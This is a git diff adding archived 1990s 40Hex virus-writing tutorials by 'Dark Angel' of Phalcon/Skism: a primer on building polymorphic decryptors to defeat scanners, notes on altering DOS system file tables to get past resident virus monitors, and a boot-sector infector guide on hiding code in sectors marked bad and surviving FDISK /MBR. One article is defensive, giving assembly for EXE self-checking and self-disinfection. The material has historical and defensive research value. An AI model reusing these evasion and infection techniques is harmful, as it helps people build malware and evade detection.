dx-> original filename + int 21h + + Optimisation is almost always code-specific. Through a combination of + restructuring and line replacement, a good programmer can drastically + reduce the size of a virus. By gaining a good feel of the 80x86 + instruction set, many more optimisations may be found. Above all, good + program design will aid in creating small viruses. diff --git a/textfiles.com/virus/datut006.txt b/textfiles.com/virus/datut006.txt new file mode 100644 index 00000000..815c0566 --- /dev/null +++ b/textfiles.com/virus/datut006.txt @@ -0,0 +1,188 @@ + + + ADVANCED POLYMORPHISM + PRIMER + PART THE FIRST + + By Dark Angel + Phalcon/Skism + + + With the recent proliferation of virus encryption "engines," I was + inspired to write my own. In a few short weeks, I was able to construct one + such routine which can hold its own. A polymorphic encryption routine is + nothing more than a complex code generator. Writing such a routine, while + not incredibly difficult, requires careful planning and perhaps more than a + few false starts. + + The utility of true polymorphism is, by now, an accepted fact. + Scanning for the majority of viruses is a trivial task, involving merely the + identification of a specific pattern of bytes in executable files. This + approach is quick and may be used to detect nearly all known viruses. + However, polymorphism throws a monkey wrench into the works. Polymorphic + viruses encode each copy of the virus with a different decryption routine. + Since (theoretically) no bytes remain constant in each generated decryption + routine, virus detectors cannot rely on a simple pattern match to locate + these viruses. Instead, they are forced to use an algorithmic appproach + susceptible to "false positives," misleading reports of the existence of the + virus where it is not truly present. Creating a reliable algorithm to + detect the polymorphic routine takes far more effort than isolating a usable + scan string. Additionally, if a virus detector fails to find even one + instance of the virus, then that single instance will remain undetected and + spawn many more generations of the virus. Survival, of course, is the + ultimate goal of the virus. + + Before attempting to write a polymorphic routine, it is necessary to + obtain a manual detailing the 80x86 instruction set. Without bit-level + manipulation of the opcodes, any polymorphic routine will be of limited + scope. The nice rigid structure of the 80x86 instruction set will be + readily apparent after a simple perusal of the opcodes. Exploitation of + this structured instruction set allows for the compact code generation + routines which lie at the heart of every significant polymorphic routine. + + After examining the structure of the opcodes, the basic organisation of + the polymorphic routine should be laid out. Here, an understanding of the + basics behind such routines is required. The traditional approach treats + the decryption routine as a simple executable string, such as + "BB1301B900022E8137123483C302E2F6." A true (advanced) polymorphic routine, + by contrast, views the decryption routine as a conceptual algorithm, such + as, "Set up a 'pointer' register, that is, the register whose contents hold + a pointer to the memory to be decrypted. Set up a counter register. Use + the pointer register to decrypt one byte. Update the pointer register. + Decrement the count register, looping if it is not zero." Two routines + which fit this algorithm follow: + + Sample Encryption 1 + ------ ---------- - + mov bx,offset startencrypt ; here, bx is the 'pointer' register + mov cx,viruslength / 2 ; and cx holds the # of iterations + decrypt_loop: + xor word ptr [bx],12h ; decrypt one word at a time + inc bx ; update the pointer register to + inc bx ; point to the next word + loop decrypt_loop ; and continue the decryption + startencrypt: + + Sample Encryption 2 + ------ ---------- - + start: + mov bx,viruslength ; now bx holds the decryption length + mov bp,offset start ; bp is the 'pointer' register + decrypt_loop: + add byte ptr [bp+0Ch],33h ; bp+0Ch -> memory location to be + ; decrypted at each iteration + inc bp ; update the pointer register + dec bx ; and the count register + jnz decrypt_loop ; loop if still more to decrypt + + The number of possibilities is essentially infinite. Naturally, + treating the decryption as an algorithm rather than as an executable string + greatly increases the flexibility in creating the actual routine. Various + portions of the decryption algorithm may be tinkered with, allowing for + further variations. Using the example above, one possible variation is to + swap the order of the setup of the registers, i.e. + + mov cx,viruslength + mov bx,offset startencrypt + + in lieu of + + mov bx,offset startencrypt + mov cx,viruslength + + It is up to the individual to decide upon the specific variations which + should be included in the polymorphic routine. Depending upon the nature of + the variations and the structure of the polymorphic routine, each increase + in power may be accompanied with only a minimal sacrifice in code length. + The goal is for the routine to be capable of generating the greatest number + of variations in the least amount of code. It is therefore desirable to + write the polymorphic routine in a manner such that additional variations + may be easily accommodated. Modularity is helpful in this respect, as the + modest overhead is rapidly offset by substantial space savings. + + The first step most polymorphic routines undergo is the determination + of the precise variation which is to be encoded. For example, a polymorphic + routine may decide that the decryption routine is to use word-length xor + encryption with bx as the pointer register, dx as a container for the + encryption value, and cx as the counter register. Once this information is + known, the routine should be able to calculate the initial value of each + variable. For example, if cx is the counter register for a byte-length + encryption, then it should hold the virus length. To increase variability, + the length of the encryption can be increased by a small, random amount. + Note that some variables, in particular the pointer register, may not be + known before encoding the rest of the routine. This detail is discussed + below. + + Of course, selecting the variables and registers will not in and of + itself yield a valid decryption routine; the polymorphic routine must also + encode the actual instructions to perform the job! The cheesiest + polymorphic routines encode a single "mov" instruction for the assignment of + a value to a register. The more complex routines encode a series of + instructions which are functionally equivalent to the simple three byte + "mov" statement yet far different in form. For example, + + mov ax, 808h + + could be replaced with + + mov ax, 303h ; ax = 303h + mov bx, 101h ; bx = 101h + add ax, bx ; ax = 404h + shl ax, 1 ; ax = 808h + + Recall that the registers should be encoded in a random order. The + counter variable, for example, should not always be the first to be encoded. + Predictability, the bane of polymorphic routines, must be avoided at all + costs. + + After the registers are encoded, the actual decryption loop should then + be encoded. The loop can perform a number of actions, the most significant + of which should be to manipulate the memory location, i.e. the actual + decryption instruction, and to update the pointer register, if necessary. + Finally, the loop instruction itself should be encoded. This can take many + forms, including "loop," "loopnz," "jnz," etc. Possible variations include + altering the decryption value register and the counter register during each + iteration. + + This is the general pattern of encoding. By placing garbling, or "do- + nothing," instructions between the essential pieces of code, further + variability may be ensured. These instructions may take many forms. If the + encoding routines are well-designed, the garbler can take advantage of the + pre-existing code to generate null instructions, such as assignments to + unused registers. + + Once the decryption routine has been written, it is necessary to + encrypt the virus code. The traditional approach gives the polymorphic + routine the job of encrypting the code. The polymorphic routine should + therefore "remember" how the precise variation used by the decryptor and + adjust the encryption routine in a complementary fashion. An alternate + approach is for the polymorphic routine to simultaneously encode both the + encryption and decryption routines. Although it adds overhead to the code, + it is an extremely flexible approach that easily accommodates variations + which may be later introduced into the polymorphic routine. + + Variable-length decryptors come at a significant trade-off; the exact + start of the decryption cannot be known before encoding the decryptor. + There are two approaches to working around this limitation. The first is to + encode the pointer register in a single instruction, i.e. mov bx,185h and to + patch the initial value once it is known. This is simplistic, though + undesirable, as it decreases the variability of the routine. An alternate + approach is to encode the encryption instruction in the form xor word ptr + [bx+185h], cx (as in Sample Encryption 2, above) instead of xor word ptr + [bx], cx (as in Sample Encryption 1). This increases the flexibility of the + routine, as the initial value of the pointer register need not be any fixed + value; correct decryption may be assured by adjusting the offset in the + decryption instruction. It is then possible to encode the pointer register + with multiple instructions, increasing flexibility. However, using either + method alone increases the predictability of the generated code. A better + approach would be to incorporate both methods into a single polymorphic + routine and randomly selecting one during each run. + + As an example of a polymorphic routine, I present DAME, Dark Angel's + Multiple Encryptor and a simple virus which utilises it. They appear in the + following article. DAME uses a variety of powerful techniques to achieve + full polymorphism. Additionally, it is easy to enhance; both the encoding + routines and the garblers can be extended algorithmically with minimal + effort. In the next issue, I will thoroughly comment and explain the + various parts of DAME. + diff --git a/textfiles.com/virus/datut007.txt b/textfiles.com/virus/datut007.txt new file mode 100644 index 00000000..bfbb107f --- /dev/null +++ b/textfiles.com/virus/datut007.txt @@ -0,0 +1,156 @@ + + + SFT's and Their Usage + + By Dark Angel + Phalcon/Skism + + + A powerful though seldom-used technique in virus writing is the use of + the system file table, an internal DOS structure similar in some respects to + FCBs, albeit vastly more powerful. The system file table holds the critical + information on the state of an open file, including the current pointer + location, the open mode, and the file size. Manipulation of the system file + tables can often replace calls to corresponding DOS interrupt routines and + therefore, when combined with other techniques, reduces the effectiveness of + a TSR virus monitor and decreases code size. + + Each open file has a corresponding system file table. The following + tables come from Ralf Brown's interrupt listing. + + Format of DOS 2.x system file tables: + Offset Size Description + 00h DWORD pointer to next file table + 04h WORD number of files in this table + 06h 28h bytes per file + Offset Size Description + 00h BYTE number of file handles referring to this file + 01h BYTE file open mode (see AH=3Dh) + 02h BYTE file attribute + 03h BYTE drive (0 = character device, 1 = A, 2 = B, etc) + 04h 11 BYTEs filename in FCB format (no path, no period, + blank-padded) + 0Fh WORD ??? + 11h WORD ??? + 13h DWORD file size??? + 17h WORD file date in packed format (see AX=5700h) + 19h WORD file time in packed format (see AX=5700h) + 1Bh BYTE device attribute (see AX=4400h) + ---character device--- + 1Ch DWORD pointer to device driver + ---block device--- + 1Ch WORD starting cluster of file + 1Eh WORD relative cluster in file of last cluster accessed + ------ + 20h WORD absolute cluster number of current cluster + 22h WORD ??? + 24h DWORD current file position??? + + Format of DOS 3.x system file tables and FCB tables: + Offset Size Description + 00h DWORD pointer to next file table + 04h WORD number of files in this table + 06h 35h bytes per file + Offset Size Description + 00h WORD number of file handles referring to this file + 02h WORD file open mode (see AH=3Dh) + bit 15 set if this file opened via FCB + 04h BYTE file attribute + 05h WORD device info word (see AX=4400h) + 07h DWORD pointer to device driver header if character device + else pointer to DOS Drive Parameter Block (see AH=32h) + 0Bh WORD starting cluster of file + 0Dh WORD file time in packed format (see AX=5700h) + 0Fh WORD file date in packed format (see AX=5700h) + 11h DWORD file size + 15h DWORD current offset in file + 19h WORD relative cluster within file of last cluster accessed + 1Bh WORD absolute cluster number of last cluster accessed + 0000h if file never read or written??? + 1Dh WORD number of sector containing directory entry + 1Fh BYTE number of dir entry within sector (byte offset/32) + 20h 11 BYTEs filename in FCB format (no path/period, blank-padded) + 2Bh DWORD (SHARE.EXE) pointer to previous SFT sharing same file + 2Fh WORD (SHARE.EXE) network machine number which opened file + 31h WORD PSP segment of file's owner (see AH=26h) + 33h WORD offset within SHARE.EXE code segment of + sharing record (see below) 0000h = none + + Format of DOS 4+ system file tables and FCB tables: + Offset Size Description + 00h DWORD pointer to next file table + 04h WORD number of files in this table + 06h 3Bh bytes per file + Offset Size Description + 00h WORD number of file handles referring to this file + 02h WORD file open mode (see AH=3Dh) + bit 15 set if this file opened via FCB + 04h BYTE file attribute + 05h WORD device info word (see AX=4400h) + bit 15 set if remote file + bit 14 set means do not set file date/time on closing + 07h DWORD pointer to device driver header if character device + else pointer to DOS Drive Parameter Block (see AH=32h) + or REDIR data + 0Bh WORD starting cluster of file + 0Dh WORD file time in packed format (see AX=5700h) + 0Fh WORD file date in packed format (see AX=5700h) + 11h DWORD file size + 15h DWORD current offset in file + ---local file--- + 19h WORD relative cluster within file of last cluster accessed + 1Bh DWORD number of sector containing directory entry + 1Fh BYTE number of dir entry within sector (byte offset/32) + ---network redirector--- + 19h DWORD pointer to REDIRIFS record + 1Dh 3 BYTEs ??? + ------ + 20h 11 BYTEs filename in FCB format (no path/period, blank-padded) + 2Bh DWORD (SHARE.EXE) pointer to previous SFT sharing same file + 2Fh WORD (SHARE.EXE) network machine number which opened file + 31h WORD PSP segment of file's owner (see AH=26h) + 33h WORD offset within SHARE.EXE code segment of + sharing record (see below) 0000h = none + 35h WORD (local) absolute cluster number of last clustr + accessed (redirector) ??? + 37h DWORD pointer to IFS driver for file, 0000000h if native DOS + + In order to exploit this nifty structure in DOS, the virus must first + find the location of the appropriate system file table. This may be easily + accomplished with a few undocumented DOS calls. Given the file handle in + bx, the following code will return the address of the corresponding system + file table: + + mov ax,1220h ; Get job file table entry to ES:DI + int 2fh ; DOS 3+ only + + mov bl,es:di ; get number of the SFT for the file handle + ; -1 = handle not open + mov ax,1216h ; get address of the system file table + int 2fh ; entry number bx + ; ES:DI now points to the system file table entry + + Now that the system file table entry address is known, it is a trivial + matter to alter the various bytes of the entry to fit your particular needs. + Most viruses must first clear a file's attributes in order to open the file + in read/write mode, since it would otherwise not be able to write to a read- + only file. This handicap is easily overcome by opening the file in read- + only mode (al = 0) and changing the byte (or word) referring to the file's + open mode to 2. This has the added benefit of bypassing some resident + alarms, which generally do not go off if a file is opened in read only mode. + It is also possible to set a file's pointer by altering the double word at + offset 15h (in DOS 3+). So a quick and easy way to reset the file pointer + is: + mov es:di+15h,0 + mov es:di+17h,0 + + It is acceptable to ignore the DOS 2.X system file table format. DOS + 2.X is not in common use today and many programs simply refuse to run under + such primitive versions. Most of the useful offsets are constant in DOS + 3.X+, which simplifies the code tremendously. + + This is only a surface treatment of a topic which warrants further + investigation. Numerous opportunities exist for the enterprising virus + author to exploit the power of the system file tables. But the only way to + find these opportunities is to experiment. Have fun! + diff --git a/textfiles.com/virus/datut008.txt b/textfiles.com/virus/datut008.txt new file mode 100644 index 00000000..73dd85f4 --- /dev/null +++ b/textfiles.com/virus/datut008.txt @@ -0,0 +1,486 @@ + + + EXE Self-Disinfection + + By Dark Angel + Phalcon/Skism + + +In the last issue of 40Hex, Demogorgon presented an article on self- +disinfecting COM files. COM file disinfection is simplistic and very +straightforward. In this article, we shall deal with the somewhat more +complex topic of EXE file self-disinfection. + +You should already be familiar with the EXE file header and how each of the +fields work. A brief summary follows (a fuller treatment may be found in +40Hex-8.007): + +Offset Description + 00 'MZ' or 'ZM' EXE signature word + 02 Bytes in last page of the image + 04 Number of pages in the file + 06 Number of relocation items + 08 Size of the header in paragraphs + 0A Minimum memory required in paragraphs + 0C Maximum memory requested in paragraphs + 0E Initial SS, offset from header in paragraphs + 10 Initial SP + 12 Negative checksum (ignored) + 14 Initial IP + 16 Initial CS, offset from header in paragraphs + 18 Offset of relocation table from start of file + 1A Overlay number (ignored) + +There are several methods which allow a virus to infect an EXE file. The +most common method involves the virus twiddling with the entry point of the +program to point to the virus. Another involves the virus altering the code +at the original entry point to jmp to its own code. A further method +involves the virus simply overwriting the code at the entry point and +storing the original code somewhere else, possibly at the end of the file. +A final method involves altering the structure of the EXE file so it is +instead recognised as a COM file. The ideal self-check routine should be +able to handle all these cases. + +Part 1 - Detection +~~~~~~~~~~~~~~~~~~ +The strategy for detection is simple; one simply needs to store a copy of +the original header and the first few bytes located at the entry code. When +the program executes, simply check these bytes to those found in the copy +of the program located on the disk. If they differ, then there is clearly +something amiss. This is essentially the same as the process for COM self- +checking, but an extra layer of complexity is added since the header is not +loaded into memory at startup. This minor difficulty may be readily +overcome by simply physically storing the header at some point in the +program. + +Since the header is not known before assembling the file, it is necessary +to patch the header into the file after assembly. This may be done rather +easily with a simple utility called 40patch. It will insert the header and +the first 20h (32d) bytes at the entry point of an EXE file at the first +occurence of the string 'Dark Angel eats goat cheese.' in the program. This +string is exactly the length of the header, so be sure to allocate an +additional 20h bytes after the string for the entry point code. + +A sample self-checking program follows: + +----EXE Self-Check Program 1 begin---- + .model small + .radix 16 + .code +; Self-Checking EXE 1 +; Written by Dark Angel of Phalcon/Skism +; For 40Hex #13 + +; To assemble: (tested with TASM 2.0) +; tasm +; tlink +entry_point: mov ah,51 ; Get current PSP to BX + int 21 + mov ds,bx + + mov bx,ds:2c ; Search the environment for + mov es,bx ; our own filename. Note that + mov di,1 ; this only works in DOS 3+. + xor ax,ax + dec di ; It also won't work if the + scasw ; environment has been + jnz $ - 2 ; released. + + xchg dx,di + inc dx + inc dx + push es ; filename to ds:dx + pop ds + mov ax,3d02 ; unless this handler is + int 21 ; tunneled, a virus may + xchg ax,bx ; infect it + mov ax,_DATA + mov ds,ax ; restore DS and ES + mov es,ax + jc error + + mov cx,1c ; check the header for + mov si,offset header ; corruption + call read_buffer + jc close_error + + mov ax,4200 ; go to the entry point + xor cx,cx + mov dx,word ptr [header+8] + add dx,word ptr [header+16] + rept 4 + shl dx,1 + adc cx,0 + endm + add dx,word ptr [header+14] ; add this to the entry point + adc cx,0 ; offset from header + int 21 + jc close_error + + mov cx,20 ; now check the first 32 bytes + mov si,offset first20 ; for corruption + call read_buffer + jc close_error + +close_error: pushf + mov ah,3e ; close the file + int 21 + popf + jc error + + mov dx,offset good ; In an actual program, replace + ; this line with a JMP to the + jmp short $+5 ; program entry point +error: mov dx,offset bad + mov ah,9 + int 21 + + mov ax,4c00 + int 21 + +read_buffer: mov ah,3f + mov dx,offset readbuffer + int 21 + jc error_read + clc + cmp ax,cx + jnz error_read + + xchg dx,di + rep cmpsb + clc + jz $+3 +error_read: stc + ret + + .data +good db 'Self-check passed with flying colours.',0Dh,0A,'$' +bad db 'Self-check failed. Program may be infected!' + db 0Dh,0A,'$' + ;0123456789ABCDEF0123456789AB +header db 'Dark Angel eats goat cheese.' +first20 db 20 dup (0) +readbuffer db 20 dup (?) + + .stack + db 100 dup (?) + end entry_point +----EXE Self-Check Program 1 end---- + +----40patch begin---- + .model tiny + .code + .radix 16 + org 100 +; 40patch +; Written by Dark Angel of Phalcon/Skism +; For 40Hex #13 + +; To assemble: (tested with TASM 2.0) +; tasm /m 40patch +; tlink /t 40patch + +; Syntax: +; 40patch filename.exe + +; 40patch will take the executable and patch in the +; header and the first 32d bytes at the entry point in the first +; occurence of the string 'Dark Angel eats goat cheese.' in the +; executable. +patch: mov ah,9 + mov dx,offset welcome + int 21 + + mov si,82 +back: lodsb + cmp al,0dh + jnz back + dec si + xchg si,di + mov byte ptr [di],0 + + mov dx,82 + mov ax,3d02 + int 21 + xchg ax,bx + jnc open_okay + + mov si,offset extension + movsw + movsw + movsb + + mov dx,82 + mov ax,3d02 + int 21 + xchg ax,bx + jnc open_okay + + mov dx,offset syntax +error: mov ah,9 + int 21 + + mov ax,4c01 + int 21 + +open_okay: mov ah,3f + mov cx,1c + mov dx,offset header + int 21 + + mov ah,3f + mov cx,20 + mov dx,offset scratchbuffer + int 21 +find_signature: xor ax,ax + mov di,offset scratchbuffer + 20 + mov cx,(100 - 20) / 2 + rep stosw + + mov ah,3f + mov cx,100 - 20 + mov dx,offset scratchbuffer + 20 + int 21 + or ax,ax + jz signature_not_found + add ax,offset scratchbuffer - signature_length + 20 + xchg bp,ax + mov ax,'aD' + mov di,offset scratchbuffer +try_again: scasw + jz signature_check + dec di + cmp di,bp + ja try_next_bytes + jmp short try_again +signature_check:mov si,offset signature + 2 + mov cx,signature_length - 2 + rep cmpsb + jz signature_found + jmp short try_again +try_next_bytes: mov si,offset scratchbuffer + 100 - 20 + mov di,offset scratchbuffer + mov cx,10 + rep movsw + jmp short find_signature + +signature_not_found: + mov dx,offset no_signature + jmp short error + +signature_found:sub di,bp + sub di,1c * 2 + xchg dx,di + or cx,-1 + mov ax,4201 + int 21 + + mov ah,40 + mov dx,offset header + mov cx,1c + int 21 + + mov ax,4201 + xor cx,cx + cwd + int 21 + push dx ax + + mov ax,4200 ; go to the entry point + xor cx,cx + mov dx,word ptr [header+8] + add dx,word ptr [header+16] + rept 4 + shl dx,1 + adc cx,0 + endm + add dx,word ptr [header+14] + adc cx,0 + int 21 + + mov ah,3f + mov dx,offset first20 + mov cx,20 + int 21 + + pop dx cx + mov ax,4200 + int 21 + + mov ah,40 + mov dx,offset first20 + mov cx,20 + int 21 + + mov ah,3e + int 21 + + mov ah,9 + mov dx,offset graceful_exit + int 21 + + mov ax,4c00 + int 21 + +welcome db '40patch',0Dh,0A,'$' +graceful_exit db 'Completed!',0Dh,0A,'$' +syntax db 'Syntax:',0Dh,0A,' 40patch filename.exe',0Dh,0A,'$' +no_signature db 'Error: Signature not found.',0Dh,0A,'$' +extension db '.EXE',0 +signature db 'Dark Angel eats goat cheese.' +signature_length = $ - signature +header db 1c dup (?) +first20 db 20 dup (?) + +scratchbuffer db 100 dup (?) + + end patch +----40patch end---- + +To test out the programs above, first assemble them both. Next, run 40patch +on the EXE file. If the EXE file is -subsequently- altered in any way, then +it will alert the user of the problem. Note that this will do nothing for a +program that is infected prior to 40patching, so be sure to run it on a +clean system. + +This simple self-checking mechanism won't catch spawning viruses. However, +it is trivial to add such a check. + +Part 2 - Disinfection +~~~~~~~~~~~~~~~~~~~~~ +Usual methods (for there are many oddball variants) of infecting an EXE +file involve appending the virus code to the end of the executable. With +this knowledge in hand, it is sometimes possible to reconstruct an infected +EXE file without too much difficulty. A simple modification of the previous +program will suffice: + +----EXE Self-Check Program 2 begin---- + .model small + .radix 16 + .code +; Self-Checking EXE 2 +; Written by Dark Angel of Phalcon/Skism +; For 40Hex #13 + +; To assemble: (tested with TASM 2.0) +; tasm +; tlink +entry_point: mov ah,51 ; Get current PSP to BX + int 21 + mov ds,bx + + mov bx,ds:2c ; Search the environment for + mov es,bx ; our own filename. Note that + mov di,1 ; this only works in DOS 3+. + xor ax,ax + dec di ; It also won't work if the + scasw ; environment has been + jnz $ - 2 ; released. + + xchg dx,di + inc dx + inc dx + push es ; filename to ds:dx + pop ds + mov ax,3d02 ; unless this handler is + int 21 ; tunneled, a virus may + xchg ax,bx ; infect it + mov ax,_DATA + mov ds,ax ; restore DS and ES + mov es,ax + mov errorcount,0 + + mov cx,1c ; check the header for + mov si,offset header ; corruption + call read_buffer + + mov ax,4200 ; go to the entry point + xor cx,cx + mov dx,word ptr [header+8] + add dx,word ptr [header+16] + rept 4 + shl dx,1 + adc cx,0 + endm + add dx,word ptr [header+14] ; add this to the entry point + adc cx,0 ; offset from header + int 21 + + mov cx,20 ; now check the first 32 bytes + mov si,offset first20 ; for corruption + call read_buffer + + mov ah,3e ; close the file + int 21 + + mov dx,offset good + cmp errorcount,0 + jz $+5 + mov dx,offset errors + + mov ah,9 + int 21 + + mov ax,4c00 + int 21 + +read_buffer: mov ah,3f + mov dx,offset readbuffer + int 21 + jc error_read + clc + cmp ax,cx + jnz error_read + + xchg dx,di + mov bp,si + rep cmpsb + jz read_buffer_ok + + push ax + xchg ax,dx + neg dx + or cx,-1 + mov ax,4201 + int 21 + + mov ah,40 + xchg bp,dx + pop cx + int 21 + + mov dx,offset bad + inc errorcount + jmp short $+5 +error_read: mov dx,offset read_error + mov ah,9 + int 21 + +read_buffer_ok: ret + + .data +good db 'Self-check passed.',0Dh,0A,'$' +errors db 'Errors were detected.',0Dh,0A,'$' +bad db 'Self-check failed. Fixing (may not work).' + db 0Dh,0A,'$' +read_error db 'Error reading file.',0Dh,0A,'$' + ;0123456789ABCDEF0123456789AB +header db 'Dark Angel eats goat cheese.' +first20 db 20 dup (0) +readbuffer db 20 dup (?) +errorcount db ? + + .stack + db 100 dup (?) + end entry_point +----EXE Self-Check Program 2 end---- + +Summary +~~~~~~~ +In general, it is poor practise to rely upon self-disinfection. The ancient +(!) adage 'restore from backups' is best followed upon the discovery of an +infection. However, it is helpful for programs to have a degree of self- +awareness in order to alert the user of a virus's presence before it has a +chance to spread too far. Disinfection will allow the user to continue +using some programs (under certain circumstances) without fear of further +spreading the virus. diff --git a/textfiles.com/virus/datut009.txt b/textfiles.com/virus/datut009.txt new file mode 100644 index 00000000..7c09989d --- /dev/null +++ b/textfiles.com/virus/datut009.txt @@ -0,0 +1,180 @@ + + + Boot Infectors + + By Dark Angel + Phalcon/Skism + + + As most of our readers have no doubt noticed, 40Hex articles have +traditionally covered file based viruses. It is time to fill in the hole and +cover the other large class of viruses, the partition table and boot sector +viruses, herein termed "boot infectors" for brevity. + File based viruses are executed after the operating system loads. Boot +infectors, however, latch onto the parts of the drive that are accessed by the +BIOS when it attempts to load the operating system itself. Therefore, there is +little that can be done to intercept the boot infector once it has +successfully installed itself onto a disk. + A brief explanation of the basics of disk terminology is in order. Each +disk is divided into 512 byte chunks called sectors. Due to an unfortunate +choice in terminology, however, the system BIOS uses the term "sectors" +differently. For our purposes, we will divide the disk into 512 byte blocks, +with block 0 residing on the beginning of the disk. + The system BIOS assigns three values to each block on the disk. The +values are known as sectors, cylinders (sometimes known as tracks), and heads +(sometimes called sides) and can be represented as a triple +(sector,cylinder,head). Each disk has a certain number of sectors (SEC), +cylinders (CYL), and heads (HDS). Cylinders are numbered from 0 to CYL - 1. +Heads are numbered from 0 to HDS - 1. Sectors, for some unfathomable reason, +are numbered from 1 to SEC. Block 0 corresponds to the triple (1,0,0) (sector +1, cylinder 0, head 0). Block 1 corresponds to (2,0,0), Block 2 with (3,0,0), +and so on, until Block SPH. Block SPH corresponds to (1,1,0), Block SPH+1 with +(2,1,0), and so on. Block 2*SPH is (1,2,0), Block 2*SPH+1 is (2,2,0), etc. +This continues until Block HPC*SPH, which is (0,0,1). + An introduction to the boot process is vital to understanding boot +infectors. When the system is reset, the BIOS checks the first block, triple +(1,0,0), of the first hard drive of the system (if any are installed, of +course) to absolute memory address 7C000. If the hard drive exists, the block +that was read in is checked for the signature 0AA55 (in reverse word format) +occuring at offset 1FE. This is the marker for a valid partition table. If a +partition table is found, the code residing in this block is executed at +0:7C00. If a valid partition table is not found (or the hard drive doesn't +exist), then the BIOS tries booting from the floppy drive. It again reads the +first block from the first floppy drive to absolute memory address 7C000. If +there is a readable disk in the drive, it will be loaded in and executed. No +check is made for the 0AA55 signature, although many boot sectors have it +there anyway just for consistency. + Technically, the first block of the hard disk is a boot sector just as it +is on floppies. However, it is sometimes given a different name because of the +partition table convention that allows multiple operating systems to reside on +a single drive. We will call it by the somewhat misleading name of partition +table. Another common name is the master boot record, for reasons that will +become clear momentarily. The partition table convention is basically a simple +structure at the end of the first block of the hard drive that defines where +each operating system exists on a given hard drive. The partition table +structure begins at offset 1BE in the block and consists of an array with four +entries. The format of each entry is: + +Ofs Size Description + 0 BYTE boot indicator, 0 = non-bootable, 80h = bootable + 1 BYTE head the partition begins on + 2 BYTE sector the partition begins on + 3 BYTE cylinder the partition begins on + 4 BYTE system indicator, indicates what OS resides in the partition + 01 indicates DOS 12-bit FAT + 04 indicates DOS 16-bit FAT + 5 BYTE head the partition ends on + 6 BYTE sector the partition ends on + 7 BYTE cylinder the partition ends on + 8 DWORD total number of blocks preceding the partition +0C DWORD total number of blocks in the partition + + The code in the partition table loads the boot record of the active +partition (as indicated in the first bit of the partition table structure). +The boot record then loads the operating system that resides in its respective +partition. + When BIOS decides to boot from a floppy, it reads in the first block off +the floppy to 7C000. Floppies don't have partition tables, so this block is +the equivalent of the boot record of a partition on a hard disk. + In DOS, the boot record consists of three bytes for a JMP followed by the +following structure, sometimes known as the BIOS parameter block (BPB): + +Offset Size Description + 3 8 bytes OEM name and version (ASCII) + 0B Word bytes per sector + 0D Byte sectors per cluster + 0E Word reserved sectors (starting at logical sector 0) + 10 Byte number of FATs + 11 Word number of root directory entries (32 bytes each) + 13 Word total sectors in partition + 15 Byte media descriptor + 17 Word sectors per FAT + 19 Word sectors per track + 1B Word number of heads + 1D Word number of hidden sectors + + The rest of the boot record consists of code that loads and executes the +DOS system files, which then take over. There are a number of terms in the +above structure which may be unfamiliar, but don't fret; they will be +explained in due course. + First, however, it is important to note that nothing requires these +structures to exist! The partition table, for example, is merely a de facto +convention which was set up to allow operating systems to co-exist on a single +hard drive. The boot record structure defined above is used by DOS for DOS +programs. Of course, another operating system could interpret the structure, +but there is no requirement for a given operating system to use that format. +When infecting disks, however, keep in mind that certain programs require the +structures to be in place. DOS, for example, won't recognise partitions +properly without the partition table being at its usual location. Floppies +also won't work properly if the boot record is not loaded when DOS requests a +read to the first block. In other words, make sure that all requests to the +partition table or boot record return the partition table and boot record in +the appropriate locations. The other code may be changed with the only +drawback in such a scheme being easy detection of the code modifications. A +better approach is to redirect requests to the modified blocks to a stored +copy of the original. In other words, stealth. + Seeing these structures, the method of infection, conceptually, at the +very least, should be apparent. It's a simple matter to replace the code of +the partition table or boot record with your own. All your code has to do is +store the block somewhere else on the disk and replace the block with itself. +When the virus gains control, it needs to put itself in memory and then load +the original block into memory at 7C000 and then transfer control to this +code. Once it is in memory, it is free to infect any disks which come into +contact with the computer. + This is all nice and easy to say, but there are a few details which would +be helpful to know before plunging into writing a boot infector. When control +is transferred to either the partition table or boot record, CS:IP is set to +0:7C00. SS:SP is undefined, so most boot infectors set it to 0:7C00, which +causes the stack to be placed just below the loading area. This is sufficient +for the needs of most viruses. + Additionally, it would be nice to be able to locate empty space to store +the original boot sector or partition table. Here, the virus has a number of +choices. In hard disks, many viruses store the original partition table in the +unused space between the partition table and the first partition. The first +partition generally starts at triple (2,1,0) or later (some start as late as +(2,0,1), so there is a wealth of space in which to store the virus in that +area. A simple calculation reveals that there are (number of cylinders - 2) +sectors between (1,0,0) where the partition table is and (2,1,0) where the +first partition starts). Multiply that value by 512 and you have the number of +bytes you can store there. That's a large chunk of space you have at your +disposal. A virus may also store itself at the end of the root directory, +although it risks overwriting valid directory entries. The BPB contains +everything necessary to calculate the location and length of the root +directory. + An alternate approach, which is used by several viruses, is to alter the +file allocation table, or FAT. The FAT is an array of entries which describe +how the blocks on the disk are related. FAT entries are either 12 or 16 bits +long, depending on the disk. 12 bit FAT's are generally used in disks and +partitions with less than 20740 sectors and 16 bit FAT's are used in larger +disks and partitions. The location and size of the FAT can be found in the +BPB. Each entry in the FAT corresponds to a block on the disk. The FAT +describes a file's placement on the disk. By following the chain, you can find +the location of the blocks of the file, since they need not be contiguous. The +value of the FAT entry is the number of the next block in the chain, i.e. an +index to the FAT entry corresponding to the next block of the file, unless it +is one of the special values. If the value of the FAT entry is 0, then the +block is unused. If the value is -1 to -8 (FFF8-FFFF) then the block is the +last block in a file. If the value is -9 to -10h (FFF0-FFF7) then the block is +reserved (usually a bad block). The first and second entries in the FAT are +always -1. The third entry governs the first data area. The idea is for the +virus to find empty blocks, mark them as bad in the FAT, and store the code +there. This way, DOS thinks the blocks are bad and does not overwrite the +virus. + One important issue with partition table infectors is whether they should +preserve the partition table itself, i.e. leave the partition table structure +at offset 1BE in the first block of the disk. Similarly, should boot sector +infectors retain the BPB? This is a particularly interesting issue with +stealth viruses, viruses which redirect attempts at accessing the partition +table or boot sector. The advantage of retaining the structures is that DOS +will recognize the disks even when the virus is not loaded in memory. +Therefore, the virus is somewhat less vulnerable to detection. However, if the +virus does not keep the structure, then it will be more difficult for the user +to boot the computer without loading the virus in memory, since DOS will not +recognise the drive. This is an especially nifty feature, since primitive +cleaning attempts such as FDISK /MBR will fail against such a virus. + Within this motley assortment of information, you will find enough to aid +you in crafting an original boot infector. There is intentionally no code in +this tutorial, mainly because there is little virus-specific information +contained within. Many of the routines used in a boot infector are important +when writing any boot sector, so there is little importance in repeating the +code here. diff --git a/textfiles.com/virus/datut010.txt b/textfiles.com/virus/datut010.txt new file mode 100644 index 00000000..0564e9ff --- /dev/null +++ b/textfiles.com/virus/datut010.txt @@ -0,0 +1,115 @@ + + + UMB Residency + 